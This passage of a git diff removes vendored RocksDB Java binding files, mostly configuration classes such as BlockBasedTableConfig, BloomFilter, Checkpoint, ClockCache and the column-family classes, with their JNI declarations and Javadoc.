-  private native void setShareTableFiles(long handle, boolean flag);
-  private native boolean shareTableFiles(long handle);
-  private native void setInfoLog(final long handle, final long infoLogHandle);
-  private native void setSync(long handle, boolean flag);
-  private native boolean sync(long handle);
-  private native void setDestroyOldData(long handle, boolean flag);
-  private native boolean destroyOldData(long handle);
-  private native void setBackupLogFiles(long handle, boolean flag);
-  private native boolean backupLogFiles(long handle);
-  private native void setBackupRateLimit(long handle, long rateLimit);
-  private native long backupRateLimit(long handle);
-  private native void setBackupRateLimiter(long handle, long rateLimiterHandle);
-  private native void setRestoreRateLimit(long handle, long rateLimit);
-  private native long restoreRateLimit(long handle);
-  private native void setRestoreRateLimiter(final long handle,
-      final long rateLimiterHandle);
-  private native void setShareFilesWithChecksum(long handle, boolean flag);
-  private native boolean shareFilesWithChecksum(long handle);
-  private native void setMaxBackgroundOperations(final long handle,
-      final int maxBackgroundOperations);
-  private native int maxBackgroundOperations(final long handle);
-  private native void setCallbackTriggerIntervalSize(final long handle,
-      long callbackTriggerIntervalSize);
-  private native long callbackTriggerIntervalSize(final long handle);
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BlockBasedTableConfig.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BlockBasedTableConfig.java
deleted file mode 100644
index 2d847de..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BlockBasedTableConfig.java
+++ /dev/null
@@ -1,452 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-/**
- * The config for plain table sst format.
- *
- * BlockBasedTable is a RocksDB's default SST file format.
- */
-public class BlockBasedTableConfig extends TableFormatConfig {
-
-  public BlockBasedTableConfig() {
-    noBlockCache_ = false;
-    blockCacheSize_ = 8 * 1024 * 1024;
-    blockCacheNumShardBits_ = 0;
-    blockSize_ = 4 * 1024;
-    blockSizeDeviation_ = 10;
-    blockRestartInterval_ = 16;
-    wholeKeyFiltering_ = true;
-    filter_ = null;
-    cacheIndexAndFilterBlocks_ = false;
-    pinL0FilterAndIndexBlocksInCache_ = false;
-    hashIndexAllowCollision_ = true;
-    blockCacheCompressedSize_ = 0;
-    blockCacheCompressedNumShardBits_ = 0;
-    checksumType_ = ChecksumType.kCRC32c;
-    indexType_ = IndexType.kBinarySearch;
-    formatVersion_ = 0;
-  }
-
-  /**
-   * Disable block cache. If this is set to true,
-   * then no block cache should be used, and the block_cache should
-   * point to a {@code nullptr} object.
-   * Default: false
-   *
-   * @param noBlockCache if use block cache
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setNoBlockCache(final boolean noBlockCache) {
-    noBlockCache_ = noBlockCache;
-    return this;
-  }
-
-  /**
-   * @return if block cache is disabled
-   */
-  public boolean noBlockCache() {
-    return noBlockCache_;
-  }
-
-  /**
-   * Set the amount of cache in bytes that will be used by RocksDB.
-   * If cacheSize is non-positive, then cache will not be used.
-   * DEFAULT: 8M
-   *
-   * @param blockCacheSize block cache size in bytes
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setBlockCacheSize(final long blockCacheSize) {
-    blockCacheSize_ = blockCacheSize;
-    return this;
-  }
-
-  /**
-   * @return block cache size in bytes
-   */
-  public long blockCacheSize() {
-    return blockCacheSize_;
-  }
-
-  /**
-   * Controls the number of shards for the block cache.
-   * This is applied only if cacheSize is set to non-negative.
-   *
-   * @param blockCacheNumShardBits the number of shard bits. The resulting
-   *     number of shards would be 2 ^ numShardBits.  Any negative
-   *     number means use default settings."
-   * @return the reference to the current option.
-   */
-  public BlockBasedTableConfig setCacheNumShardBits(
-      final int blockCacheNumShardBits) {
-    blockCacheNumShardBits_ = blockCacheNumShardBits;
-    return this;
-  }
-
-  /**
-   * Returns the number of shard bits used in the block cache.
-   * The resulting number of shards would be 2 ^ (returned value).
-   * Any negative number means use default settings.
-   *
-   * @return the number of shard bits used in the block cache.
-   */
-  public int cacheNumShardBits() {
-    return blockCacheNumShardBits_;
-  }
-
-  /**
-   * Approximate size of user data packed per block.  Note that the
-   * block size specified here corresponds to uncompressed data.  The
-   * actual size of the unit read from disk may be smaller if
-   * compression is enabled.  This parameter can be changed dynamically.
-   * Default: 4K
-   *
-   * @param blockSize block size in bytes
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setBlockSize(final long blockSize) {
-    blockSize_ = blockSize;
-    return this;
-  }
-
-  /**
-   * @return block size in bytes
-   */
-  public long blockSize() {
-    return blockSize_;
-  }
-
-  /**
-   * This is used to close a block before it reaches the configured
-   * 'block_size'. If the percentage of free space in the current block is less
-   * than this specified number and adding a new record to the block will
-   * exceed the configured block size, then this block will be closed and the
-   * new record will be written to the next block.
-   * Default is 10.
-   *
-   * @param blockSizeDeviation the deviation to block size allowed
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setBlockSizeDeviation(
-      final int blockSizeDeviation) {
-    blockSizeDeviation_ = blockSizeDeviation;
-    return this;
-  }
-
-  /**
-   * @return the hash table ratio.
-   */
-  public int blockSizeDeviation() {
-    return blockSizeDeviation_;
-  }
-
-  /**
-   * Set block restart interval
-   *
-   * @param restartInterval block restart interval.
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setBlockRestartInterval(
-      final int restartInterval) {
-    blockRestartInterval_ = restartInterval;
-    return this;
-  }
-
-  /**
-   * @return block restart interval
-   */
-  public int blockRestartInterval() {
-    return blockRestartInterval_;
-  }
-
-  /**
-   * If true, place whole keys in the filter (not just prefixes).
-   * This must generally be true for gets to be efficient.
-   * Default: true
-   *
-   * @param wholeKeyFiltering if enable whole key filtering
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setWholeKeyFiltering(
-      final boolean wholeKeyFiltering) {
-    wholeKeyFiltering_ = wholeKeyFiltering;
-    return this;
-  }
-
-  /**
-   * @return if whole key filtering is enabled
-   */
-  public boolean wholeKeyFiltering() {
-    return wholeKeyFiltering_;
-  }
-
-  /**
-   * Use the specified filter policy to reduce disk reads.
-   *
-   * {@link org.rocksdb.Filter} should not be disposed before options instances
-   * using this filter is disposed. If {@link Filter#dispose()} function is not
-   * called, then filter object will be GC'd automatically.
-   *
-   * {@link org.rocksdb.Filter} instance can be re-used in multiple options
-   * instances.
-   *
-   * @param filter {@link org.rocksdb.Filter} Filter Policy java instance.
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setFilter(
-      final Filter filter) {
-    filter_ = filter;
-    return this;
-  }
-
-  /**
-   * Indicating if we'd put index/filter blocks to the block cache.
-     If not specified, each "table reader" object will pre-load index/filter
-     block during table initialization.
-   *
-   * @return if index and filter blocks should be put in block cache.
-   */
-  public boolean cacheIndexAndFilterBlocks() {
-    return cacheIndexAndFilterBlocks_;
-  }
-
-  /**
-   * Indicating if we'd put index/filter blocks to the block cache.
-     If not specified, each "table reader" object will pre-load index/filter
-     block during table initialization.
-   *
-   * @param cacheIndexAndFilterBlocks and filter blocks should be put in block cache.
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setCacheIndexAndFilterBlocks(
-      final boolean cacheIndexAndFilterBlocks) {
-    cacheIndexAndFilterBlocks_ = cacheIndexAndFilterBlocks;
-    return this;
-  }
-
-  /**
-   * Indicating if we'd like to pin L0 index/filter blocks to the block cache.
-     If not specified, defaults to false.
-   *
-   * @return if L0 index and filter blocks should be pinned to the block cache.
-   */
-  public boolean pinL0FilterAndIndexBlocksInCache() {
-    return pinL0FilterAndIndexBlocksInCache_;
-  }
-
-  /**
-   * Indicating if we'd like to pin L0 index/filter blocks to the block cache.
-     If not specified, defaults to false.
-   *
-   * @param pinL0FilterAndIndexBlocksInCache pin blocks in block cache
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setPinL0FilterAndIndexBlocksInCache(
-      final boolean pinL0FilterAndIndexBlocksInCache) {
-    pinL0FilterAndIndexBlocksInCache_ = pinL0FilterAndIndexBlocksInCache;
-    return this;
-  }
-
-  /**
-   * Influence the behavior when kHashSearch is used.
-     if false, stores a precise prefix to block range mapping
-     if true, does not store prefix and allows prefix hash collision
-     (less memory consumption)
-   *
-   * @return if hash collisions should be allowed.
-   */
-  public boolean hashIndexAllowCollision() {
-    return hashIndexAllowCollision_;
-  }
-
-  /**
-   * Influence the behavior when kHashSearch is used.
-     if false, stores a precise prefix to block range mapping
-     if true, does not store prefix and allows prefix hash collision
-     (less memory consumption)
-   *
-   * @param hashIndexAllowCollision points out if hash collisions should be allowed.
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setHashIndexAllowCollision(
-      final boolean hashIndexAllowCollision) {
-    hashIndexAllowCollision_ = hashIndexAllowCollision;
-    return this;
-  }
-
-  /**
-   * Size of compressed block cache. If 0, then block_cache_compressed is set
-   * to null.
-   *
-   * @return size of compressed block cache.
-   */
-  public long blockCacheCompressedSize() {
-    return blockCacheCompressedSize_;
-  }
-
-  /**
-   * Size of compressed block cache. If 0, then block_cache_compressed is set
-   * to null.
-   *
-   * @param blockCacheCompressedSize of compressed block cache.
-   * @return the reference to the current config.
-   */
-  public BlockBasedTableConfig setBlockCacheCompressedSize(
-      final long blockCacheCompressedSize) {
-    blockCacheCompressedSize_ = blockCacheCompressedSize;
-    return this;
-  }
-
-  /**
-   * Controls the number of shards for the block compressed cache.
-   * This is applied only if blockCompressedCacheSize is set to non-negative.
-   *
-   * @return numShardBits the number of shard bits.  The resulting
-   *     number of shards would be 2 ^ numShardBits.  Any negative
-   *     number means use default settings.
-   */
-  public int blockCacheCompressedNumShardBits() {
-    return blockCacheCompressedNumShardBits_;
-  }
-
-  /**
-   * Controls the number of shards for the block compressed cache.
-   * This is applied only if blockCompressedCacheSize is set to non-negative.
-   *
-   * @param blockCacheCompressedNumShardBits the number of shard bits.  The resulting
-   *     number of shards would be 2 ^ numShardBits.  Any negative
-   *     number means use default settings."
-   * @return the reference to the current option.
-   */
-  public BlockBasedTableConfig setBlockCacheCompressedNumShardBits(
-      final int blockCacheCompressedNumShardBits) {
-    blockCacheCompressedNumShardBits_ = blockCacheCompressedNumShardBits;
-    return this;
-  }
-
-  /**
-   * Sets the checksum type to be used with this table.
-   *
-   * @param checksumType {@link org.rocksdb.ChecksumType} value.
-   * @return the reference to the current option.
-   */
-  public BlockBasedTableConfig setChecksumType(
-      final ChecksumType checksumType) {
-    checksumType_ = checksumType;
-    return this;
-  }
-
-  /**
-   *
-   * @return the currently set checksum type
-   */
-  public ChecksumType checksumType() {
-    return checksumType_;
-  }
-
-  /**
-   * Sets the index type to used with this table.
-   *
-   * @param indexType {@link org.rocksdb.IndexType} value
-   * @return the reference to the current option.
-   */
-  public BlockBasedTableConfig setIndexType(
-      final IndexType indexType) {
-    indexType_ = indexType;
-    return this;
-  }
-
-  /**
-   *
-   * @return the currently set index type
-   */
-  public IndexType indexType() {
-    return indexType_;
-  }
-
-  /**
-   * <p>We currently have three versions:</p>
-   *
-   * <ul>
-   * <li><strong>0</strong> - This version is currently written
-   * out by all RocksDB's versions by default. Can be read by really old
-   * RocksDB's. Doesn't support changing checksum (default is CRC32).</li>
-   * <li><strong>1</strong> - Can be read by RocksDB's versions since 3.0.
-   * Supports non-default checksum, like xxHash. It is written by RocksDB when
-   * BlockBasedTableOptions::checksum is something other than kCRC32c. (version
-   * 0 is silently upconverted)</li>
-   * <li><strong>2</strong> - Can be read by RocksDB's versions since 3.10.
-   * Changes the way we encode compressed blocks with LZ4, BZip2 and Zlib
-   * compression. If you don't plan to run RocksDB before version 3.10,
-   * you should probably use this.</li>
-   * </ul>
-   * <p> This option only affects newly written tables. When reading existing
-   * tables, the information about version is read from the footer.</p>
-   *
-   * @param formatVersion integer representing the version to be used.
-   * @return the reference to the current option.
-   */
-  public BlockBasedTableConfig setFormatVersion(
-      final int formatVersion) {
-    assert(formatVersion >= 0 && formatVersion <= 2);
-    formatVersion_ = formatVersion;
-    return this;
-  }
-
-  /**
-   *
-   * @return the currently configured format version.
-   * See also: {@link #setFormatVersion(int)}.
-   */
-  public int formatVersion() {
-    return formatVersion_;
-  }
-
-
-
-  @Override protected long newTableFactoryHandle() {
-    long filterHandle = 0;
-    if (filter_ != null) {
-      filterHandle = filter_.nativeHandle_;
-    }
-
-    return newTableFactoryHandle(noBlockCache_, blockCacheSize_,
-        blockCacheNumShardBits_, blockSize_, blockSizeDeviation_,
-        blockRestartInterval_, wholeKeyFiltering_,
-        filterHandle, cacheIndexAndFilterBlocks_,
-        pinL0FilterAndIndexBlocksInCache_,
-        hashIndexAllowCollision_, blockCacheCompressedSize_,
-        blockCacheCompressedNumShardBits_,
-        checksumType_.getValue(), indexType_.getValue(),
-        formatVersion_);
-  }
-
-  private native long newTableFactoryHandle(
-      boolean noBlockCache, long blockCacheSize, int blockCacheNumShardBits,
-      long blockSize, int blockSizeDeviation, int blockRestartInterval,
-      boolean wholeKeyFiltering, long filterPolicyHandle,
-      boolean cacheIndexAndFilterBlocks, boolean pinL0FilterAndIndexBlocksInCache,
-      boolean hashIndexAllowCollision, long blockCacheCompressedSize,
-      int blockCacheCompressedNumShardBits, byte checkSumType,
-      byte indexType, int formatVersion);
-
-  private boolean cacheIndexAndFilterBlocks_;
-  private boolean pinL0FilterAndIndexBlocksInCache_;
-  private IndexType indexType_;
-  private boolean hashIndexAllowCollision_;
-  private ChecksumType checksumType_;
-  private boolean noBlockCache_;
-  private long blockSize_;
-  private long blockCacheSize_;
-  private int blockCacheNumShardBits_;
-  private long blockCacheCompressedSize_;
-  private int blockCacheCompressedNumShardBits_;
-  private int blockSizeDeviation_;
-  private int blockRestartInterval_;
-  private Filter filter_;
-  private boolean wholeKeyFiltering_;
-  private int formatVersion_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BloomFilter.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BloomFilter.java
deleted file mode 100644
index 316c3ad..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BloomFilter.java
+++ /dev/null
@@ -1,79 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Bloom filter policy that uses a bloom filter with approximately
- * the specified number of bits per key.
- *
- * <p>
- * Note: if you are using a custom comparator that ignores some parts
- * of the keys being compared, you must not use this {@code BloomFilter}
- * and must provide your own FilterPolicy that also ignores the
- * corresponding parts of the keys. For example, if the comparator
- * ignores trailing spaces, it would be incorrect to use a
- * FilterPolicy (like {@code BloomFilter}) that does not ignore
- * trailing spaces in keys.</p>
- */
-public class BloomFilter extends Filter {
-
-  private static final int DEFAULT_BITS_PER_KEY = 10;
-  private static final boolean DEFAULT_MODE = true;
-
-  /**
-   * BloomFilter constructor
-   *
-   * <p>
-   * Callers must delete the result after any database that is using the
-   * result has been closed.</p>
-   */
-  public BloomFilter() {
-    this(DEFAULT_BITS_PER_KEY, DEFAULT_MODE);
-  }
-
-  /**
-   * BloomFilter constructor
-   *
-   * <p>
-   * bits_per_key: bits per key in bloom filter. A good value for bits_per_key
-   * is 10, which yields a filter with ~ 1% false positive rate.
-   * </p>
-   * <p>
-   * Callers must delete the result after any database that is using the
-   * result has been closed.</p>
-   *
-   * @param bitsPerKey number of bits to use
-   */
-  public BloomFilter(final int bitsPerKey) {
-    this(bitsPerKey, DEFAULT_MODE);
-  }
-
-  /**
-   * BloomFilter constructor
-   *
-   * <p>
-   * bits_per_key: bits per key in bloom filter. A good value for bits_per_key
-   * is 10, which yields a filter with ~ 1% false positive rate.
-   * <p><strong>default bits_per_key</strong>: 10</p>
-   *
-   * <p>use_block_based_builder: use block based filter rather than full filter.
-   * If you want to builder full filter, it needs to be set to false.
-   * </p>
-   * <p><strong>default mode: block based filter</strong></p>
-   * <p>
-   * Callers must delete the result after any database that is using the
-   * result has been closed.</p>
-   *
-   * @param bitsPerKey number of bits to use
-   * @param useBlockBasedMode use block based mode or full filter mode
-   */
-  public BloomFilter(final int bitsPerKey, final boolean useBlockBasedMode) {
-    super(createNewBloomFilter(bitsPerKey, useBlockBasedMode));
-  }
-
-  private native static long createNewBloomFilter(final int bitsKeyKey,
-      final boolean useBlockBasedMode);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BuiltinComparator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BuiltinComparator.java
deleted file mode 100644
index 2c89bf2..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/BuiltinComparator.java
+++ /dev/null
@@ -1,20 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Builtin RocksDB comparators
- *
- * <ol>
- *   <li>BYTEWISE_COMPARATOR - Sorts all keys in ascending bytewise
- *   order.</li>
- *   <li>REVERSE_BYTEWISE_COMPARATOR - Sorts all keys in descending bytewise
- *   order</li>
- * </ol>
- */
-public enum BuiltinComparator {
-  BYTEWISE_COMPARATOR, REVERSE_BYTEWISE_COMPARATOR
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Cache.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Cache.java
deleted file mode 100644
index 3952e1d..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Cache.java
+++ /dev/null
@@ -1,13 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-
-public abstract class Cache extends RocksObject {
-  protected Cache(final long nativeHandle) {
-    super(nativeHandle);
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java
deleted file mode 100644
index 26bf358..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CassandraCompactionFilter.java
+++ /dev/null
@@ -1,18 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Just a Java wrapper around CassandraCompactionFilter implemented in C++
- */
-public class CassandraCompactionFilter
-    extends AbstractCompactionFilter<Slice> {
-  public CassandraCompactionFilter(boolean purgeTtlOnExpiration) {
-      super(createNewCassandraCompactionFilter0(purgeTtlOnExpiration));
-  }
-
-  private native static long createNewCassandraCompactionFilter0(boolean purgeTtlOnExpiration);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java
deleted file mode 100644
index a09556a..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/CassandraValueMergeOperator.java
+++ /dev/null
@@ -1,20 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * CassandraValueMergeOperator is a merge operator that merges two cassandra wide column
- * values.
- */
-public class CassandraValueMergeOperator extends MergeOperator {
-    public CassandraValueMergeOperator() {
-        super(newSharedCassandraValueMergeOperator());
-    }
-
-    private native static long newSharedCassandraValueMergeOperator();
-
-    @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Checkpoint.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Checkpoint.java
deleted file mode 100644
index 0009699..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Checkpoint.java
+++ /dev/null
@@ -1,66 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Provides Checkpoint functionality. Checkpoints
- * provide persistent snapshots of RocksDB databases.
- */
-public class Checkpoint extends RocksObject {
-
-  /**
-   * Creates a Checkpoint object to be used for creating open-able
-   * snapshots.
-   *
-   * @param db {@link RocksDB} instance.
-   * @return a Checkpoint instance.
-   *
-   * @throws java.lang.IllegalArgumentException if {@link RocksDB}
-   *     instance is null.
-   * @throws java.lang.IllegalStateException if {@link RocksDB}
-   *     instance is not initialized.
-   */
-  public static Checkpoint create(final RocksDB db) {
-    if (db == null) {
-      throw new IllegalArgumentException(
-          "RocksDB instance shall not be null.");
-    } else if (!db.isOwningHandle()) {
-      throw new IllegalStateException(
-          "RocksDB instance must be initialized.");
-    }
-    Checkpoint checkpoint = new Checkpoint(db);
-    return checkpoint;
-  }
-
-  /**
-   * <p>Builds an open-able snapshot of RocksDB on the same disk, which
-   * accepts an output directory on the same disk, and under the directory
-   * (1) hard-linked SST files pointing to existing live SST files
-   * (2) a copied manifest files and other files</p>
-   *
-   * @param checkpointPath path to the folder where the snapshot is going
-   *     to be stored.
-   * @throws RocksDBException thrown if an error occurs within the native
-   *     part of the library.
-   */
-  public void createCheckpoint(final String checkpointPath)
-      throws RocksDBException {
-    createCheckpoint(nativeHandle_, checkpointPath);
-  }
-
-  private Checkpoint(final RocksDB db) {
-    super(newCheckpoint(db.nativeHandle_));
-    this.db_ = db;
-  }
-
-  private final RocksDB db_;
-
-  private static native long newCheckpoint(long dbHandle);
-  @Override protected final native void disposeInternal(final long handle);
-
-  private native void createCheckpoint(long handle, String checkpointPath)
-      throws RocksDBException;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ChecksumType.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ChecksumType.java
deleted file mode 100644
index def9f2e..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ChecksumType.java
+++ /dev/null
@@ -1,39 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Checksum types used in conjunction with BlockBasedTable.
- */
-public enum ChecksumType {
-  /**
-   * Not implemented yet.
-   */
-  kNoChecksum((byte) 0),
-  /**
-   * CRC32 Checksum
-   */
-  kCRC32c((byte) 1),
-  /**
-   * XX Hash
-   */
-  kxxHash((byte) 2);
-
-  /**
-   * Returns the byte value of the enumerations value
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value_;
-  }
-
-  private ChecksumType(byte value) {
-    value_ = value;
-  }
-
-  private final byte value_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ClockCache.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ClockCache.java
deleted file mode 100644
index a66dc0e..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ClockCache.java
+++ /dev/null
@@ -1,59 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Similar to {@link LRUCache}, but based on the CLOCK algorithm with
- * better concurrent performance in some cases
- */
-public class ClockCache extends Cache {
-
-  /**
-   * Create a new cache with a fixed size capacity.
-   *
-   * @param capacity The fixed size capacity of the cache
-   */
-  public ClockCache(final long capacity) {
-    super(newClockCache(capacity, -1, false));
-  }
-
-  /**
-   * Create a new cache with a fixed size capacity. The cache is sharded
-   * to 2^numShardBits shards, by hash of the key. The total capacity
-   * is divided and evenly assigned to each shard.
-   * numShardBits = -1 means it is automatically determined: every shard
-   * will be at least 512KB and number of shard bits will not exceed 6.
-   *
-   * @param capacity The fixed size capacity of the cache
-   * @param numShardBits The cache is sharded to 2^numShardBits shards,
-   *     by hash of the key
-   */
-  public ClockCache(final long capacity, final int numShardBits) {
-    super(newClockCache(capacity, numShardBits, false));
-  }
-
-  /**
-   * Create a new cache with a fixed size capacity. The cache is sharded
-   * to 2^numShardBits shards, by hash of the key. The total capacity
-   * is divided and evenly assigned to each shard. If strictCapacityLimit
-   * is set, insert to the cache will fail when cache is full.
-   * numShardBits = -1 means it is automatically determined: every shard
-   * will be at least 512KB and number of shard bits will not exceed 6.
-   *
-   * @param capacity The fixed size capacity of the cache
-   * @param numShardBits The cache is sharded to 2^numShardBits shards,
-   *     by hash of the key
-   * @param strictCapacityLimit insert to the cache will fail when cache is full
-   */
-  public ClockCache(final long capacity, final int numShardBits,
-      final boolean strictCapacityLimit) {
-    super(newClockCache(capacity, numShardBits, strictCapacityLimit));
-  }
-
-  private native static long newClockCache(final long capacity,
-      final int numShardBits, final boolean strictCapacityLimit);
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyDescriptor.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyDescriptor.java
deleted file mode 100644
index d932fd9..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyDescriptor.java
+++ /dev/null
@@ -1,61 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * <p>Describes a column family with a
- * name and respective Options.</p>
- */
-public class ColumnFamilyDescriptor {
-
-  /**
-   * <p>Creates a new Column Family using a name and default
-   * options,</p>
-   *
-   * @param columnFamilyName name of column family.
-   * @since 3.10.0
-   */
-  public ColumnFamilyDescriptor(final byte[] columnFamilyName) {
-    this(columnFamilyName, new ColumnFamilyOptions());
-  }
-
-  /**
-   * <p>Creates a new Column Family using a name and custom
-   * options.</p>
-   *
-   * @param columnFamilyName name of column family.
-   * @param columnFamilyOptions options to be used with
-   *     column family.
-   * @since 3.10.0
-   */
-  public ColumnFamilyDescriptor(final byte[] columnFamilyName,
-      final ColumnFamilyOptions columnFamilyOptions) {
-    columnFamilyName_ = columnFamilyName;
-    columnFamilyOptions_ = columnFamilyOptions;
-  }
-
-  /**
-   * Retrieve name of column family.
-   *
-   * @return column family name.
-   * @since 3.10.0
-   */
-  public byte[] columnFamilyName() {
-    return columnFamilyName_;
-  }
-
-  /**
-   * Retrieve assigned options instance.
-   *
-   * @return Options instance assigned to this instance.
-   */
-  public ColumnFamilyOptions columnFamilyOptions() {
-    return columnFamilyOptions_;
-  }
-
-  private final byte[] columnFamilyName_;
-  private final ColumnFamilyOptions columnFamilyOptions_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyHandle.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyHandle.java
deleted file mode 100644
index 7726cc6..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyHandle.java
+++ /dev/null
@@ -1,42 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * ColumnFamilyHandle class to hold handles to underlying rocksdb
- * ColumnFamily Pointers.
- */
-public class ColumnFamilyHandle extends RocksObject {
-  ColumnFamilyHandle(final RocksDB rocksDB,
-      final long nativeHandle) {
-    super(nativeHandle);
-    // rocksDB must point to a valid RocksDB instance;
-    assert(rocksDB != null);
-    // ColumnFamilyHandle must hold a reference to the related RocksDB instance
-    // to guarantee that while a GC cycle starts ColumnFamilyHandle instances
-    // are freed prior to RocksDB instances.
-    this.rocksDB_ = rocksDB;
-  }
-
-  /**
-   * <p>Deletes underlying C++ iterator pointer.</p>
-   *
-   * <p>Note: the underlying handle can only be safely deleted if the RocksDB
-   * instance related to a certain ColumnFamilyHandle is still valid and
-   * initialized. Therefore {@code disposeInternal()} checks if the RocksDB is
-   * initialized before freeing the native handle.</p>
-   */
-  @Override
-  protected void disposeInternal() {
-    if(rocksDB_.isOwningHandle()) {
-      disposeInternal(nativeHandle_);
-    }
-  }
-
-  @Override protected final native void disposeInternal(final long handle);
-
-  private final RocksDB rocksDB_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyOptions.java
deleted file mode 100644
index 647b92e..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/ColumnFamilyOptions.java
+++ /dev/null
@@ -1,909 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.ArrayList;
-import java.util.List;
-import java.util.Properties;
-
-/**
